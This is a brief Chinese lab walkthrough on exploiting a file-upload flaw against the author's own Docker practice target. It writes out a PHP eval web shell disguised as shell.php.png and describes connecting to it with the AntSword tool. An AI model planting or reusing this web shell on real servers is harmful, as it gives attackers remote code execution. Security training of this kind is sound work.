一、新建一个木马

新建一个记事本命名为shell.php.png。打开保存内容为<?php @eval($_POST['chuan']); ?>

chuan为密码,可以自己设置

二、打开靶场

三、提交图片马

四、验证文件是否可以打开,空白意为没报错。

四、打开蚁剑,新建连接

五、双击链接,打开靶机目录

因为是自己创建的docker容器,所以没有其他目录。

内容理解:利用apache等web上传文件漏洞,通过工具蚁剑连接。

更多推荐